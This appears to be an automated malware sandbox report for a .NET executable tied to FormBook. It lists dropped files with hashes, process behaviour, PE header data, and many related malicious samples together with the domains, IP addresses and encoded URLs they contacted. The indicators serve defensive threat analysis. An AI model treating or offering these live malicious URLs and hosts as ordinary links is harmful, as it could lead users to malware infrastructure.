Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:05:06	API Interceptor	24x Sleep call for process: powershell.exe modified
09:05:22	API Interceptor	1x Sleep call for process: WerFault.exe modified
09:05:53	API Interceptor	14151594x Sleep call for process: chkdsk.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
103.168.172.37	Factura (3).exe	Get hash	malicious	FormBook	Browse	www.celebration24.co.uk/mcz6/
103.168.172.37	PO0424024.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.celebration24.co.uk/pq0o/
136.143.186.12	RFQ 5654077845567895504_d0c.exe	Get hash	malicious	FormBook	Browse	www.jrksa.info/nq8t/
	VSL_BUNKER INQUIRY.exe	Get hash	malicious	FormBook	Browse	www.topscaleservices.com/uyud/?4PB=a4DuWa1aWcmJH21/SNxRR+JRQb1v/kzaj3WKu4zLUxUUlKGTu9D1sWAogGI9gEZiY1gr5T6O35XBnrIr/I/ZCy9af96nyleFJwK0nJryK+5dgXb3T0bI8KcvkRm3LjrqBQ==&wdZh=n2Ih08C05RZDa
	SCAN_0033245554672760018765524126524_pdf.exe	Get hash	malicious	FormBook	Browse	www.jrksa.info/nq8t/
	PAYMENT COPY.exe	Get hash	malicious	FormBook	Browse	www.topscaleservices.com/uyud/?VlEHDVvh=a4DuWa1aWcmJH21/SNxRR+JRQb1v/kzaj3WKu4zLUxUUlKGTu9D1sWAogGI9gEZiY1gr5T6O35XBnrIr/I/ZCy9af/SljyarCQCdkJfuLPpdjFvVaxfdqpU=&BHPD=o2nt
	RFQ _ARC 101011-24.exe	Get hash	malicious	FormBook	Browse	www.jrksa.info/nq8t/
	z99Solicituddecotizacion.exe	Get hash	malicious	FormBook	Browse	www.sinpercar.com/ewzn/?AfE=EyRqAwwT05x65m/38S7UcLqbbN3UVnxK+wcuGdQYbEhrNA0VrW3zgm6HwQ8b+SGfrDA2jpiQna5wuS+JvhaLr4daouyBMWls9Q==&hDmL=Vbxhs6
	Solicitud_de_cotizacion.exe	Get hash	malicious	FormBook	Browse	www.sinpercar.com/ewzn/?yl5tw=e4elEdCHk&ubRHX=EyRqAwwT05x65m/05S7qd6qUG8bqCUZK+wcuGdQYbEhrNA0VrW3zgm6HwQ8b+SGfrDA2jpiQna5wuS+JvhaOhfhKsYm/blZJ8A==
	z17Solicituddecotizacion.exe	Get hash	malicious	FormBook	Browse	www.sinpercar.com/ewzn/?iHHH=EyRqAwwT05x65m/38S7UcLqbbN3UVnxK+wcuGdQYbEhrNA0VrW3zgm6HwQ8b+SGfrDA2jpiQna5wuS+JvhaLr4daouyBMWls9Q==&Yn5l=8n1PFtVH
	3Xq2C4NXet.exe	Get hash	malicious	FormBook	Browse	www.lorriewisemandover.com/e28o/?ATRP5bN=lzqZi2zDhr45QvVL0Wowx7cC2vfgLC/0aeqflcFBcMxdZfK6oIJnDuftThWR4X6Zm5AD&8p-=ejrddJAX3d-L7hG
	#U4e5d#U6708#U58f0#U660e_40981677.xls	Get hash	malicious	FormBook	Browse	www.ikkasolutions.com/rs10/?v4rHvZ=w6smRJLf7toRM37PveJYJoQG3FAEgiXhsh+ewBNr2VQF5XhnGTEUJIksPhSKQXlh0IN1YQ==&9rQtJ=qzup7FjH1rfp6
104.37.39.71	Product Listsd#U0334r#U0334o#U0334w#U0334..exe	Get hash	malicious	FormBook	Browse	www.gledingakademiet.no/pshj/
	Factura (3).exe	Get hash	malicious	FormBook	Browse	www.gledingakademiet.no/mcz6/
	rQuotationRequestandProductAvailabilityForm.exe	Get hash	malicious	FormBook	Browse	www.gledingakademiet.no/pshj/
217.160.0.111	Request for Quotation # 3200025006.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.carliente.com/ntpp/
	Request for Quotation # 3200025006.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.carliente.com/ntpp/
	Factura (3).exe	Get hash	malicious	FormBook	Browse	www.carliente.com/mcz6/
	JUSTIFICANTE DE PAGO 18903547820000.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.carliente.com/ntpp/
	STATEMENT OF ACCOUNT.exe	Get hash	malicious	FormBook	Browse	www.carliente.com/3g97/?iJdtI=UBp4nvRH&-b=pss1I4hPKcXAgTePnemGc7FXasx9qfjLrlXUMEqkxJwN3Lu9fPUDc8IPlpsJO9uNl7TAjBTqm2QSFPkGLslIPQEm/bcAIhxallCZA6vttiGmo3Ak8A==
	kargonuzu do#U011frulay#U0131n_05082024-Ref_#0123647264823.exe	Get hash	malicious	FormBook	Browse	www.carliente.com/ve3w/
	NHhH776.exe	Get hash	malicious	FormBook	Browse	www.carliente.com/ve3w/
	shipping document.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.carliente.com/3g97/
	listXofXP.O.doc	Get hash	malicious	FormBook	Browse	www.andrewcrawford.store/q8io/?O4883=HXFtJZVPfNB0&-ZEHgzPx=9NBY9KXzWN9RAeS5ibqsEdeev5FWFMIFtZ8Uab8Ez6YdQ5xfInqB1smFejio0oqmJamksA==

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
allinonestore-567794-react-native.b567794.prod.eastus.az.svc.builder.ai	RE Draft BL for BK#440019497 REF#388855.exe	Get hash	malicious	FormBook	Browse	57.151.38.169
	Factura (3).exe	Get hash	malicious	FormBook	Browse	57.151.38.169
	4333.exe	Get hash	malicious	DBatLoader, FormBook	Browse	57.151.38.169
	RE Draft BL for BK#440019497 REF#388855.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	57.151.38.169
	kargonuzu do#U011frulay#U0131n_05082024-Ref_#0123647264823.exe	Get hash	malicious	FormBook	Browse	57.151.38.169
	NHhH776.exe	Get hash	malicious	FormBook	Browse	57.151.38.169
www.deaybrid.info	EST- 250424-0370pdf.exe	Get hash	malicious	FormBook	Browse	162.0.237.22
	Your file name without extension goes here.exe	Get hash	malicious	FormBook	Browse	162.0.237.22
	Factura (3).exe	Get hash	malicious	FormBook	Browse	162.0.237.22
	Order confirmation F20 - 011 PURCHASE ORDER.scr.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	162.0.237.22
zhs.zohosites.com	RFQ 5654077845567895504_d0c.exe	Get hash	malicious	FormBook	Browse	136.143.186.12
	VSL_BUNKER INQUIRY.exe	Get hash	malicious	FormBook	Browse	136.143.186.12
	SCAN_0033245554672760018765524126524_pdf.exe	Get hash	malicious	FormBook	Browse	136.143.186.12
	justiicante transferencia compra vvda-pdf.exe	Get hash	malicious	FormBook, GuLoader	Browse	136.143.186.12
	PAYMENT COPY.exe	Get hash	malicious	FormBook	Browse	136.143.186.12
	RFQ _ARC 101011-24.exe	Get hash	malicious	FormBook	Browse	136.143.186.12
	z99Solicituddecotizacion.exe	Get hash	malicious	FormBook	Browse	136.143.186.12
	Solicitud_de_cotizacion.exe	Get hash	malicious	FormBook	Browse	136.143.186.12
	z17Solicituddecotizacion.exe	Get hash	malicious	FormBook	Browse	136.143.186.12
	3Xq2C4NXet.exe	Get hash	malicious	FormBook	Browse	136.143.186.12

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ONEANDONE-ASBrauerstrasse48DE	pFvpxWS2lD.exe	Get hash	malicious	FormBook	Browse	217.160.230.215
	DPqKF5vqpe.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, SystemBC	Browse	82.165.178.113
	rShippingDocuments.exe	Get hash	malicious	FormBook	Browse	217.160.230.215
	http://eal2023.es	Get hash	malicious	Unknown	Browse	217.76.156.252
	cbIcBAgY5W.exe	Get hash	malicious	SystemBC	Browse	217.76.146.62
	https://www.4dots-software.com/simple-disable-key/	Get hash	malicious	Unknown	Browse	217.160.0.74
	NZH0ajOmNM.elf	Get hash	malicious	Xmrig	Browse	217.160.70.42
	aCrx4lfgir.elf	Get hash	malicious	Xmrig	Browse	217.160.70.42
	Payroll List.exe	Get hash	malicious	FormBook	Browse	217.160.230.215
	dMY6QiHAIpPPqiV.exe	Get hash	malicious	FormBook	Browse	217.160.0.193
NAMECHEAP-NETUS	https://fspxt-f05389.ingress-erytho.ewp.live/wp-content/plugins/deviswetransfer%202/log.php	Get hash	malicious	Unknown	Browse	63.250.43.133
	pp0fHVNbib.exe	Get hash	malicious	FormBook, GuLoader	Browse	162.0.237.22
	ulACwpUCSU.exe	Get hash	malicious	FormBook, GuLoader	Browse	162.0.237.22
	cbIcBAgY5W.exe	Get hash	malicious	SystemBC	Browse	198.54.122.136
	http://wvmy.bet/	Get hash	malicious	Unknown	Browse	162.255.119.239
	hesaphareketi_01.exe	Get hash	malicious	AgentTesla	Browse	198.54.114.199
	Employee Perfomance Record.vbs	Get hash	malicious	FormBook, GuLoader	Browse	162.255.119.138
	PO 886060324.exe	Get hash	malicious	FormBook	Browse	199.188.201.135
	https://engaging-activity-ac4ca3f199.media.strapiapp.com/33_5711a9a219.html#abc@gmail.com	Get hash	malicious	HTMLPhisher	Browse	198.54.114.176
	https://afrikikoresort.com/	Get hash	malicious	Unknown	Browse	63.250.38.71
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe	https://googleweblight.com/i?u=https://hizoom.co.uk/wp-admin/js/hereme/46343/8473r/YXN0cmlkLnd1cnN0ZXJAaWxlZGVmcmFuY2UuZnI=&domain=iledefrance.fr	Get hash	malicious	HTMLPhisher	Browse	103.163.246.82
	bot.mips.elf	Get hash	malicious	Mirai, Okiru	Browse	103.179.189.37
	bot.arm.elf	Get hash	malicious	Mirai, Okiru	Browse	103.179.189.37
	bot.mpsl.elf	Get hash	malicious	Mirai, Okiru	Browse	103.179.189.37
	bot.x86_64.elf	Get hash	malicious	Mirai, Okiru	Browse	103.179.189.37
	bot.arm5.elf	Get hash	malicious	Mirai, Okiru	Browse	103.179.189.37
	bot.x86.elf	Get hash	malicious	Mirai, Okiru	Browse	103.179.189.37
	Z6uUjtIZ0j.exe	Get hash	malicious	FormBook, GuLoader	Browse	103.163.138.166
	kJRELa7CL3.exe	Get hash	malicious	DBatLoader, Remcos	Browse	103.186.117.159
	staff record or employee record.exe	Get hash	malicious	FormBook	Browse	103.191.208.49
ZOHO-ASUS	cbIcBAgY5W.exe	Get hash	malicious	SystemBC	Browse	204.141.43.44
	https://tracking.onehash.ai/ck1/2d6f.fc070546be8e8d7/ad6e3f90-2201-11ef-a8f3-52540088df93/b97d490ee53087a42c557eeb7ff9083d627d161d/1?e=geyq9i%2FvDm1u0isQF8QbPz1WOrqZeXJHJMhVeeVO9X50%2BQM7uRftlmCGw%2FaXvkwb6LkXoSwWZnSRNZuu%2B7UvEZLIg7n2RDR5vSdrDOBIDsg%3D	Get hash	malicious	Phisher	Browse	136.143.190.213
	file.exe	Get hash	malicious	SystemBC	Browse	204.141.43.44
	RFQ 5654077845567895504_d0c.exe	Get hash	malicious	FormBook	Browse	136.143.186.12
	RE_ Toyotalift Northeast_May28.eml	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	136.143.191.162
	VSL_BUNKER INQUIRY.exe	Get hash	malicious	FormBook	Browse	136.143.186.12
	SCAN_0033245554672760018765524126524_pdf.exe	Get hash	malicious	FormBook	Browse	136.143.186.12
	http://isme-zcmp.campaign-view.eu	Get hash	malicious	Unknown	Browse	136.143.190.180
	PAYMENT COPY.exe	Get hash	malicious	FormBook	Browse	136.143.186.12
	RFQ _ARC 101011-24.exe	Get hash	malicious	FormBook	Browse	136.143.186.12
ONECOMDK	DPqKF5vqpe.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, SystemBC	Browse	185.164.14.70
	Utility R.lnk	Get hash	malicious	FormBook	Browse	46.30.213.191
	DASERA LPO PMT-4 FURNITURE 28052024.pdf.exe	Get hash	malicious	FormBook	Browse	77.111.241.124
	DPL SO-CDC63 24-0527MU.xls.vbs	Get hash	malicious	FormBook, GuLoader	Browse	46.30.211.38
	Purchase Order_20240503.exe	Get hash	malicious	FormBook	Browse	46.30.215.104
	3Lf408k9mg.exe	Get hash	malicious	PureLog Stealer, SystemBC	Browse	185.164.14.86
	PO JAN 2024.exe	Get hash	malicious	FormBook	Browse	46.30.213.132
	Purchase Order_20240528.exe	Get hash	malicious	FormBook	Browse	46.30.215.104
	USD46k Swift_PDF.exe	Get hash	malicious	FormBook	Browse	46.30.215.104
	2023-1392 Martin y Ruiz Recambio Surtekpdf.exe	Get hash	malicious	FormBook, GuLoader	Browse	46.30.215.97

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_H25iQbxCki.exe_f2ee5e307e47d36665237e6f9f8c1a2a4a558fb_6bdd3c55_682a866f-9f68-41ec-b671-4e9ee78eec3e\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.3184839097543093
Encrypted:	false
SSDEEP:	192:SME6/lX50UnUtaWBe3ZF7lRgTVsyXdzuiF+Z24lO8zr:tz/oUnUtamqaVrNzuiF+Y4lO8zr
MD5:	5AD79DB6AC82B7EA4342A86EC738E59F
SHA1:	4D07B81FFBFF6AC87763FA061937D63B1B644902
SHA-256:	3AC8216815018B945AECF91A012B8EFECFD95451B4463D17A5B5A52AE8C7100E
SHA-512:	99096E9BA97267BBDA0643B3CBD61C3CB29B2312754A2117CDC4E6FE3697772CA46DF5726F0125DFD0CC4C15E84018F770ED0D2E9EF6BEE547601E2CEF387B17
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.2.0.6.6.3.0.6.6.6.0.8.9.7.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.2.0.6.6.3.0.8.1.4.5.2.5.8.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.8.2.a.8.6.6.f.-.9.f.6.8.-.4.1.e.c.-.b.6.7.1.-.4.e.9.e.e.7.8.e.e.c.3.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.1.a.b.c.9.9.2.-.5.e.a.4.-.4.f.4.4.-.b.7.2.8.-.4.9.0.3.5.8.a.d.8.4.2.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.H.2.5.i.Q.b.x.C.k.i...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.E.p.a.z.e.h.o.m.a.y.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.f.c.-.0.0.0.1.-.0.0.1.4.-.a.2.5.9.-.b.9.f.7.4.8.b.7.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.b.2.c.8.c.4.d.e.b.f.c.f.2.c.f.d.3.1.1.0.8.d.6.5.3.7.9.a.6.a.4.0.0.0.0.0.0.0.0.!.0.0.0.0.9.c.1.5.9.e.c.0.c.6.d.f.c.c.b.5.c.4.7.b.4.5.4.b.8.7.7.b.e.8.6.f.e.b.4.6.b.2.6.8.!.H.2.5.i.Q.b.x.C.k.i...

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2640.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 16 streams, Wed Jun 5 13:05:07 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	558846
Entropy (8bit):	3.33063747201404
Encrypted:	false
SSDEEP:	6144:74cTjQOupFxKZ8PQ/Wb38N0MIqHMp3QHj:UcTruJKMzj8N/IqHMdQD
MD5:	46E664BAA5D71FD87FC2B7D283EED978
SHA1:	F0D9359C4E0345F7820CA9F5292AC416A61F28FE
SHA-256:	8A9EF87DCDEFC8E93B70BDE5885574D3F8EF1B43DEB4F8CEE90C4758BA697069
SHA-512:	888AA83DF7F35A8290266C52B10894BECCEC26C04601EE8EB9B219F79B181B851566E33F11F425095CE029572372D2772EC0B89263C38E64DF8BE1132A73D309
Malicious:	false
Preview:	MDMP..a..... ........b`f........................X!..........$...L+......t#..p+.......a..............l.......8...........T........... @...F...........N...........P..............................................................................eJ......hQ......Lw......................T...........zb`f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2A09.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8862
Entropy (8bit):	3.7135138139548594
Encrypted:	false
SSDEEP:	192:R6l7wVeJM0Zlx5r6Y9NKbgmfA6J5prr89bpbbPfYDjm:R6lXJ3ZlD6YnKbgmfAiopbTfE6
MD5:	6A56F078A12103EC997A097C8357B587
SHA1:	276E17F69A4C8638AB26FFD9FB6647FE34768F99
SHA-256:	716C84B3BBB788C82ED83B38B09475820585DC39450784C29D6F6023BA752886
SHA-512:	34EFB50F99FF17032BD6176176A1A21D884D428B3FE69D5A35919334B7FDADE23DF2D995FD5E91D3A7EAED77CC74A917AE9E349585F8FD0A2F8ABA7B3444BB23
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.2.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2A58.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4768
Entropy (8bit):	4.527945582454487
Encrypted:	false
SSDEEP:	48:cvIwWl8zszJg771I9GBWpW8VYBYm8M4JuJAF8myq852sIx3ppqEd:uIjfNI71Q7VNJ8m7ZpqEd
MD5:	ACE95F9814B8A1E55F2B7D31B140F718
SHA1:	1E6E9211B6E309ACEB317B3518A3350BE63950AD
SHA-256:	33F8F953762BE49C383530FF191D96EC5A11386CEF72637027F7E108F9C424F3
SHA-512:	337AE99825B61510B6A360726C2C6596C30452DE2BF7FA0DFA443E03C8FC460B3EA1CF8C745890901C4316F00944F02ACD8A9C3310C33DBBB6D57E4A64DDD663
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="354487" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:Nlllul3nqth:NllUa
MD5:	851531B4FD612B0BC7891B3F401A478F
SHA1:	483F0D1E71FB0F6EFF159AA96CC82422CF605FB3
SHA-256:	383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F
SHA-512:	A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931
Malicious:	false
Preview:	@...e.................................&..............@..........

C:\Users\user\AppData\Local\Temp\2E85-1J297

Download File

Process:	C:\Windows\SysWOW64\chkdsk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3s0tjzuw.p51.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eysd10bw.ajf.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g35jm0fp.ux4.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_htilnplb.3ax.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.466053114847994
Encrypted:	false
SSDEEP:	6144:9IXfpi67eLPU9skLmb0b4sWSPKaJG8nAgejZMMhA2gX4WABl0uNqdwBCswSbt:uXD94sWlLZMM6YFHA+t
MD5:	01F9C285EB749D315296FB026CE60AE5
SHA1:	AA4049314191FA83D70FF36EE120864727A1A85A
SHA-256:	C0AC266C5191AB3538FBDE4AADE18473C29B9F563D6482E8FCF27CB149EF6FE6
SHA-512:	412B13BDB1D0E29D863D2C8983A75FC709F3C9F0EE9B5EF91947902C8C09018E0F81588D3EDF3192615BC513488C9CE719E3435FC50E56E86F8912A516F44F03
Malicious:	false
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmf...H...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.6858215744987595
TrID:	Win64 Executable Console Net Framework (206006/5) 48.58% Win64 Executable Console (202006/5) 47.64% Win64 Executable (generic) (12005/4) 2.83% Generic Win/DOS Executable (2004/3) 0.47% DOS Executable Generic (2002/1) 0.47%
File name:	H25iQbxCki.exe
File size:	841'692 bytes
MD5:	61300540a2fccd044d641329a7102e47
SHA1:	9c159ec0c6dfccb5c47b454b877be86feb46b268
SHA256:	0e7a378b14d45a01c31a3de6198273f1837ec450d2a9a457432896e1311023a6
SHA512:	83f7aecbae679b412d53e415204ce6acfed30ff010219e240dc63c80bbfae1567cfbf91a4d6c4f8502b8043d7fba8d7be0f9477845855e976c7e484df519ee99
SSDEEP:	12288:E/u6ybQGaEnRCrpWIHKjn0YDO37S1SXqRZE0igIsD2yetE/Lk03nQz68:E/CQrE4rpNKjsW1S6zEQT2y0Gv18
TLSH:	1905DF23B5CC525EC6BB49FB697242E60273EDD36604AA02FAF3F34D48BB641265C0D5
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....?............"...0.................. ....@...... ..............................H0....`................................

File Icon


Icon Hash:	2274b3339659c286

Static PE Info

General

Entrypoint:	0x400000
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xAFEE3FE3 [Sat Jul 14 08:18:43 2063 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:

